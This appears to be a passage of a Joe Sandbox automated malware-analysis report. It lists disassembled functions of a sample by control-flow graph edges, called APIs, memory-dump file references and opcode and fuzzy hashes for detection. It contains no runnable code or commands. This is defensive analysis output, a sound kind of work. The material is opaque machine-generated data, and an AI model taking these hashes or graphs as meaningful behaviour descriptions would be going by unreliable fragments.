                                                                        control_flow_graph 504 3a89a0-3a89b1 call 3dcb70 507 3a8cb3-3a8cbb ExitProcess 504->507 508 3a89b7-3a89cf call 3d6620 504->508 512 3a8cae call 3ddeb0 508->512 513 3a89d5-3a89fb 508->513 512->507 517 3a89fd-3a89ff 513->517 518 3a8a01-3a8bda 513->518 517->518 520 3a8c8a-3a8ca2 call 3a9ed0 518->520 521 3a8be0-3a8c50 518->521 520->512 526 3a8ca4 call 3ace80 520->526 522 3a8c52-3a8c54 521->522 523 3a8c56-3a8c88 521->523 522->523 523->520 528 3a8ca9 call 3ab930 526->528 528->512
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 003A8CB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 7b92827063fbc013c622b22fc42ca49f80565c8bb8e1d5b92bebb9f85582e452
                                                                        • Instruction ID: b494dc896e836a4a69d1f4b9843935acb77ecfaed7b304c8d267b604ef148883
                                                                        • Opcode Fuzzy Hash: 7b92827063fbc013c622b22fc42ca49f80565c8bb8e1d5b92bebb9f85582e452
                                                                        • Instruction Fuzzy Hash: 9771E473B547044BC708DEBADC9235BF6D6ABC8714F0AD83D6888DB391EA789C054685
                                                                        Function 003C8770 Relevance: 1.7, Strings: 1, Instructions: 466COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 530 3c8770-3c8791 531 3c87a0-3c87fa 530->531 531->531 532 3c87fc-3c8808 531->532 533 3c880a-3c8812 532->533 534 3c8854-3c8868 532->534 536 3c8820-3c8827 533->536 535 3c8870-3c889c 534->535 535->535 539 3c889e-3c88a2 535->539 537 3c8829-3c882c 536->537 538 3c8830-3c8836 536->538 537->536 540 3c882e 537->540 538->534 541 3c8838-3c884c call 3ddf70 538->541 542 3c88a8-3c88cf call 3db7e0 539->542 543 3c8960-3c8962 539->543 540->534 547 3c8851 541->547 549 3c88d0-3c892a 542->549 544 3c8c7e-3c8c87 543->544 547->534 549->549 550 3c892c-3c8938 549->550 551 3c893a-3c8946 550->551 552 3c8967-3c896b 550->552 554 3c8950-3c8957 551->554 553 3c898c-3c8990 552->553 557 3c8c75-3c8c7b call 3db860 553->557 558 3c8996-3c899f 553->558 555 3c896d-3c8973 554->555 556 3c8959-3c895c 554->556 555->553 561 3c8975-3c8984 call 3ddf70 555->561 556->554 559 3c895e 556->559 557->544 562 3c89a0-3c89ab 558->562 559->553 566 3c8989 561->566 562->562 565 3c89ad-3c89d5 562->565 567 3c89de 565->567 568 3c89d7-3c89dc 565->568 566->553 569 3c89e0-3c89ee call 3a82b0 567->569 568->569 572 3c8a00-3c8a0a 569->572 573 3c8a0c-3c8a0f 572->573 574 3c89f0-3c89fe 572->574 576 3c8a10-3c8a1f 573->576 574->572 575 3c8a23-3c8a2a 574->575 578 3c8c6c-3c8c6d call 3a82c0 575->578 579 3c8a30-3c8a3b 575->579 576->576 577 3c8a21 576->577 577->574 585 3c8c72 578->585 580 3c8a3d-3c8a47 579->580 581 3c8a8b-3c8aa0 call 3a82b0 579->581 584 3c8a5c-3c8a60 580->584 589 3c8c04-3c8c29 581->589 590 3c8aa6-3c8aac 581->590 587 3c8a50 584->587 588 3c8a62-3c8a6b 584->588 585->557 591 3c8a51-3c8a5a 587->591 592 3c8a6d-3c8a78 588->592 593 3c8a80-3c8a84 588->593 595 3c8c30-3c8c44 589->595 590->589 594 3c8ab2-3c8abb 590->594 591->581 591->584 592->591 593->591 596 3c8a86-3c8a89 593->596 597 3c8ac0-3c8aca 594->597 595->595 598 3c8c46-3c8c69 call 3a9190 call 3a82c0 595->598 596->591 599 3c8acc-3c8ad1 597->599 600 3c8ae0-3c8ae5 597->600 598->578 602 3c8ba0-3c8ba6 599->602 603 3c8ae7-3c8aea 600->603 604 3c8b10-3c8b22 600->604 610 3c8ba8-3c8bae 602->610 603->604 606 3c8aec-3c8b00 603->606 607 3c8b28-3c8b2b 604->607 608 3c8bba-3c8bc3 604->608 606->602 607->608 613 3c8b31-3c8b99 607->613 611 3c8bcd-3c8bd0 608->611 612 3c8bc5-3c8bcb 608->612 610->589 615 3c8bb0-3c8bb2 610->615 617 3c8bfc-3c8c02 611->617 618 3c8bd2-3c8bfa 611->618 612->610 613->602 615->597 616 3c8bb8 615->616 616->589 617->602 618->602
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: =:;8
                                                                        • API String ID: 2994545307-508151936
                                                                        • Opcode ID: 78e92ab8e117e3e1e28fb014070ee5b924627b85fd490b072f60f57e8e96ac50
                                                                        • Instruction ID: b676d9e286008244f657411d2416a8b37a2a57bdd88b9db4ae65c1b1df960f4a
                                                                        • Opcode Fuzzy Hash: 78e92ab8e117e3e1e28fb014070ee5b924627b85fd490b072f60f57e8e96ac50
                                                                        • Instruction Fuzzy Hash: 7DD14AB6A483118BD715CB28CC82B77B796EBC5304F1A863DD8868B781DA749E06C791
                                                                        Function 003B9530 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 619 3b9530-3b9551 620 3b9560-3b9569 619->620 620->620 621 3b956b-3b9573 620->621 622 3b9580-3b9589 621->622 622->622 623 3b958b-3b9597 622->623 624 3b9599-3b959e 623->624 625 3b95a0-3b95a2 623->625 626 3b95a9-3b95bb call 3a82b0 624->626 625->626 629 3b95bd-3b95c3 626->629 630 3b95e1-3b95f2 626->630 631 3b95d0-3b95df 629->631 632 3b9613 630->632 633 3b95f4-3b95fa 630->633 631->630 631->631 635 3b9616-3b9639 call 3e0480 632->635 634 3b9600-3b960f 633->634 634->634 636 3b9611 634->636 639 3b9640-3b9652 635->639 636->635 639->639 640 3b9654-3b965b 639->640 641 3b96da-3b96ea call 3d9800 640->641 642 3b98b8-3b98bd call 3a82c0 640->642 643 3b989f-3b98a9 call 3a82c0 640->643 644 3b96d2 640->644 645 3b98b2 640->645 646 3b96d0 640->646 647 3b96f0-3b96fd call 3d9800 640->647 648 3b9715-3b971a 640->648 649 3b9794-3b979f 640->649 650 3b974b-3b9762 call 3e07b0 640->650 651 3b96ca 640->651 652 3b9729-3b9744 call 3e0480 640->652 653 3b9769-3b977e call 3a82b0 call 3e0880 640->653 654 3b996c-3b997f call 3a82c0 640->654 655 3b9662-3b9676 640->655 656 3b9982-3b998b 640->656 657 3b9721 640->657 658 3b9980 640->658 659 3b98c7-3b98db 640->659 660 3b9706-3b970e 640->660 641->647 676 3b98c2-3b98c4 642->676 643->645 644->641 647->660 648->642 648->643 648->645 648->649 648->650 648->653 648->654 648->656 648->657 648->658 648->659 668 3b97a0-3b97a9 649->668 650->642 650->643 650->645 650->649 650->653 650->654 650->656 650->658 650->659 651->646 652->642 652->643 652->645 652->649 652->650 652->653 652->654 652->656 652->657 652->658 652->659 687 3b9783-3b978d 653->687 654->658 669 3b9680-3b96b4 655->669 657->652 667 3b98e0-3b98f4 659->667 660->642 660->643 660->645 660->648 660->649 660->650 660->652 660->653 660->654 660->656 660->657 660->658 660->659 667->667 678 3b98f6-3b98fe 667->678 668->668 679 3b97ab-3b97b5 668->679 669->669 680 3b96b6-3b96c3 669->680 676->659 684 3b9900-3b9911 678->684 685 3b9937 678->685 686 3b97c0-3b97c9 679->686 680->641 680->642 680->643 680->644 680->645 680->646 680->647 680->648 680->649 680->650 680->651 680->652 680->653 680->654 680->656 680->657 680->658 680->659 680->660 688 3b9920-3b9927 684->688 691 3b9940-3b9946 685->691 686->686 689 3b97cb-3b97e3 686->689 687->642 687->643 687->645 687->649 687->654 687->656 687->658 687->659 690 3b9929-3b992c 688->690 688->691 692 3b97ec-3b97ef 689->692 693 3b97e5-3b97ea 689->693 690->688 694 3b992e 690->694 696 3b9948 691->696 697 3b9951-3b9963 call 3ddf70 691->697 695 3b97f6-3b9807 call 3a82b0 692->695 693->695 694->685 702 3b9809-3b980f 695->702 703 3b9821-3b9835 695->703 696->697 697->654 704 3b9810-3b981f 702->704 705 3b9851-3b985f 703->705 706 3b9837-3b983a 703->706 704->703 704->704 707 3b9881-3b9897 call 3a8fd0 705->707 708 3b9861-3b9864 705->708 709 3b9840-3b984f 706->709 707->643 710 3b9870-3b987f 708->710 709->705 709->709 710->707 710->710
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: efg`
                                                                        • API String ID: 0-115929991
                                                                        • Opcode ID: 8e9a141c995758e423592a2bce2567e09f403e56710a16d225f9e58d81ed7201
                                                                        • Instruction ID: 5a54ed307a8041ff1acd64caca3ba78d8cfcf2dc2000f7d33151448dd5a576c7
                                                                        • Opcode Fuzzy Hash: 8e9a141c995758e423592a2bce2567e09f403e56710a16d225f9e58d81ed7201
                                                                        • Instruction Fuzzy Hash: E4C10171D00215CBCB268F58DC92BFB73B4FF56364F194659EA42AB6D1E730A900CBA0
                                                                        Function 003DDF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(003DBA46,?,00000010,00000005,00000000,?,00000000,?,?,003B9158,?,?,003B19B4), ref: 003DDF9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                        Function 003AE0D8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: efg`
                                                                        • API String ID: 2994545307-115929991
                                                                        • Opcode ID: 5853ec8d5a1bcdd38cd87bc0aefc50f085ea05dc5838e76060a40246627b56d0
                                                                        • Instruction ID: 2998be03ffd8a59a742b5ff58fe508f69fe223cc8e2a86821a42c4f9ed945b78
                                                                        • Opcode Fuzzy Hash: 5853ec8d5a1bcdd38cd87bc0aefc50f085ea05dc5838e76060a40246627b56d0
                                                                        • Instruction Fuzzy Hash: 8C510B76A043509BD733EB60DC82B9F7356EFD2314F194428E9496B242DF346E068797
                                                                        Function 003E1580 Relevance: .3, Instructions: 293COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6a93d9e2457b05300cca8ca4f324236334f9893e381230125801567f20403c60
                                                                        • Instruction ID: bec9ba9dab56d366b8dbc6f2910dfdc6d1ce72fd224ca97445ecd1337567e0f1
                                                                        • Opcode Fuzzy Hash: 6a93d9e2457b05300cca8ca4f324236334f9893e381230125801567f20403c60
                                                                        • Instruction Fuzzy Hash: 948122726083958FD716DF69D89062FB7E1EF89310F098A3CE995DB291E670DC418782
                                                                        Function 003E0C80 Relevance: .3, Instructions: 269COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 686942c1b0683ee720079cd4764dcc220a54d8017ce89c8b3976107e22e46101
                                                                        • Instruction ID: e9965818849f7588bc5a2d6006001a73132fcccdf8e94db6b7209227a85e8ca4
                                                                        • Opcode Fuzzy Hash: 686942c1b0683ee720079cd4764dcc220a54d8017ce89c8b3976107e22e46101
                                                                        • Instruction Fuzzy Hash: D77124355083959BC72A9B69D85062FB3E6FFC4710F1A8A3CE4858B2A4E7B09C91C742
                                                                        Function 003DB8E0 Relevance: .2, Instructions: 217COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d4f4e174063fadc628666d23ceee568ad4be09f7e34b0e36bfd8f024b8044899
                                                                        • Instruction ID: ac55320322e430ae9448acc43790dec4b11c47b3d8dd3b0db1817978fed31770
                                                                        • Opcode Fuzzy Hash: d4f4e174063fadc628666d23ceee568ad4be09f7e34b0e36bfd8f024b8044899
                                                                        • Instruction Fuzzy Hash: 37513A77A08354CBD7229F25A84066BF7A2EBD5720F2BC62DD9D56B391D3319C028781
                                                                        Function 003C1790 Relevance: .2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29bc1d88217521ecac370bcc7bc3c3869bb7830c7ab8d8e4883f391d0e27d43b
                                                                        • Instruction ID: ad9a362c2b1a5930ade13d0d83080bfa6ff7cda23f66480ff121a5eddf750ff3
                                                                        • Opcode Fuzzy Hash: 29bc1d88217521ecac370bcc7bc3c3869bb7830c7ab8d8e4883f391d0e27d43b
                                                                        • Instruction Fuzzy Hash: 92412971A09384AFD7619F68AC86B6B77ECEB8A354F04893CF549CB2C1D634DC058792
                                                                        Function 003ABC9D Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
